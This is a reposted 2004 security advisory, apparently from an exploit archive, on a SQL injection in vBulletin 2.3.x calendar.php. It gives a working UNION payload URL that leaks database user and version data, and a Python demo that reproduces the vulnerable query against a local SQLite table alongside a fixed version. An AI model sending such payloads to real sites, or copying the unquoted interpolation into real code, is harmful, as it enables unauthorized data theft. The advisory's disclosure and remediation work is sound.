vBulletin Forum 2.3.xx SQL Injection
Source: www.safechina.net  Author: mslug  Published: 2004-01-06



Website: www.safechina.net
Discovered by: mslug (a1476854_at_hotmail.com)

There is a SQL injection flaw in calendar.php: the eventid request parameter is interpolated into a query without being cast to an integer or quoted.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
// $eventid comes straight from the request; it is neither cast to int nor quoted
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

MySQL gained UNION in version 4.0, so if the server runs 4.0 or later a UNION attack can be used to return attacker-chosen columns through this query.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

query_first() returns only the first row of the result set, so the injected row has to sort ahead of the real one. That is why the payload supplies '0000-0-0' as eventdate and appends ORDER BY eventdate: the injected row sorts before event 12 and is the one the edit form displays, with user() and version() landing in the event and subject fields.
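The following is an added example, not code from the advisory or from vBulletin. It rebuilds the vulnerable query_first() pattern against an in-memory SQLite table with constructed rows, feeds it the eventid parameter from a URL modelled on the one above, and shows that the UNION row is what the "first row" logic returns, then shows a hardened form that rejects the same input. Two adaptations are assumptions forced by SQLite rather than MySQL: the parentheses around the second SELECT are dropped (SQLite rejects them), and user()/version() are replaced by a literal string and sqlite_version().

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed sample data standing in for vBulletin's calendar_events table
# (assumed schema: the columns named in the vulnerable query plus eventid).
SAMPLE_EVENTS = [
    # eventid, allowsmilies, public, userid, eventdate, event, subject
    (12, 1, 1, 7, "2004-01-06", "Team meeting in room 4", "Meeting"),
    (13, 1, 0, 9, "2004-01-10", "Salary review (private)", "HR"),
]

COLUMNS = "allowsmilies,public,userid,eventdate,event,subject"


def build_db():
    """In-memory SQLite stand-in for the forum database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE calendar_events (eventid INTEGER PRIMARY KEY, allowsmilies INTEGER, "
        "public INTEGER, userid INTEGER, eventdate TEXT, event TEXT, subject TEXT)"
    )
    conn.executemany("INSERT INTO calendar_events VALUES (?,?,?,?,?,?,?)", SAMPLE_EVENTS)
    return conn


def eventid_from_url(url):
    """Return the eventid GET parameter as PHP would see it: URL-decoded and unvalidated."""
    return parse_qs(urlsplit(url).query)["eventid"][0]


def query_first_vulnerable(conn, eventid):
    """Mirror of the calendar.php query: $eventid is interpolated unquoted into the SQL.
    Like vBulletin's query_first(), only the first row of the result set is returned."""
    sql = f"SELECT {COLUMNS} FROM calendar_events WHERE eventid = {eventid}"
    return conn.execute(sql).fetchone()


def query_first_fixed(conn, eventid):
    """Hardened form: accept only a plain integer and bind it as a query parameter."""
    if not str(eventid).isdigit():
        return None
    sql = f"SELECT {COLUMNS} FROM calendar_events WHERE eventid = ?"
    return conn.execute(sql, (int(eventid),)).fetchone()


# Constructed request modelled on the advisory's URL. Assumptions for SQLite: no
# parentheses around the second SELECT, and 'dbuser@localhost' / sqlite_version()
# in place of MySQL's user() / version().
ATTACK_URL = (
    "http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20SELECT%20"
    "allowsmilies,public,userid,'0000-0-0','dbuser@localhost',sqlite_version()%20"
    "FROM%20calendar_events%20WHERE%20eventid%20=%2013%20order%20by%20eventdate"
)


def run_demo():
    """Run the injected parameter through both query forms; returns (leaked, blocked, legit)."""
    conn = build_db()
    injected = eventid_from_url(ATTACK_URL)
    leaked = query_first_vulnerable(conn, injected)   # the UNION row, sorted first by '0000-0-0'
    blocked = query_first_fixed(conn, injected)       # None: input is not a plain integer
    legit = query_first_fixed(conn, "12")             # normal request still works
    return leaked, blocked, legit


if __name__ == "__main__":
    leaked, blocked, legit = run_demo()
    print("vulnerable query returned:", leaked)
    print("fixed query returned for the same input:", blocked)
    print("fixed query for eventid=12:", legit)
```

The leaked row carries userid 9 from the private event 13 and the injected literal and version string in the event and subject columns, which is exactly where the edit form would render them. Removing the ORDER BY from ATTACK_URL is left as an exercise: without it the row order of the UNION is not guaranteed, which is the point the advisory makes about query_first().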



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS03-043 - Messenger exploit b
·Microsoft ASN.1 Library Buffer
·phpbb_sql.pl
·Serv-U \site chmod xxx \Exploi
·phpBB v2.06 search_id sql inje
·Serv-U MDTM Exploits
·EPIC4 remote client-side stack
·PSOProxy v0.91 Remote buffer O
·85NIPrint.c 远程攻击程序
·ServU MDTM exploit
·XP图象式样让权限提升的漏洞
·WFTPD Server buffer overflow R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved